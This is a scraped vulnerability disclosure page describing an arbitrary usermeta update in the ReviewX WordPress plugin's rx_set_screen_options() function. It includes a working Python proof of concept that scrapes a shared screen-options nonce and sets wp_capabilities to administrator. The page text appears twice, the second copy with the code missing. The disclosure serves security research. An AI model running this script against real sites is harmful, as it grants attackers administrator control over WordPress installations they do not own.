REPORT ID: a889c3ff-5df0-4d7e-951f-0b0406468efa
The plugin contains an Arbitrary Usermeta Update vulnerability, which leads to Privilege Escalation.
The rx_set_screen_options() function updates the user meta with the following code:
rx_set_screen_options()
$option = $_POST['wp_screen_options']['option']; $value = $_POST['wp_screen_options']['value']; update_user_meta( $user->ID, $option, $value );
There are no restrictions on what user meta values can be updated, and there is no restriction on the value either.
The function includes a nonce check, but it uses a general nonce that is available on every admin page where there is a screen option.
I created a Python script that queries the nonce and updates wp_capabilities to administrator:
wp_capabilities
administrator
import requests from bs4 import BeautifulSoup website_url = 'http://localhost/' username = 'user' password = 'pw' # format url website_url = website_url.rstrip('\/') with requests.Session() as session: # login request session.post(website_url + '/wp-login.php', data={ 'log': username, 'pwd': password }) # get nonce value from input hidden html response = session.get(website_url + '/wp-admin/') print(response.text) soup = BeautifulSoup(response.text, 'html.parser') screenoptionnonce_element = soup.find('input', {'id': 'screenoptionnonce'}) screenoptionnonce = screenoptionnonce_element['value'] # update user capabilities request session.post(website_url + '/wp-admin/', headers={'Content-Type': 'application/x-www-form-urlencoded'}, data={ 'wp_screen_options[option]': 'wp_capabilities', 'wp_screen_options[value][administrator]': '1', 'screenoptionnonce': screenoptionnonce })
We would truly appreciate it if you bought us a bunny (food for a snow leopard).
ReviewX by WPDeveloper WordPress plugin Privilege Escalation
REPORT ID: a889c3ff-5df0-4d7e-951f-0b0406468efa
The plugin contains an Arbitrary Usermeta Update vulnerability, which leads to Privilege Escalation.
Let’s check the plugin
The
rx_set_screen_options()
function updates the user meta with the following code:There are no restrictions on what user meta values can be updated, and there is no restriction on the value either.
The function includes a nonce check, but it uses a general nonce that is available on every admin page where there is a screen option.
Let’s see how we can exploit this vulnerability
I created a Python script that queries the nonce and updates
wp_capabilities
toadministrator
:References
Let's discuss
Attributes
Classification
Researcher
Tags
exploit privilege escalation wordpress pluginSupport Us?
We would truly appreciate it if you bought us a bunny (food for a snow leopard).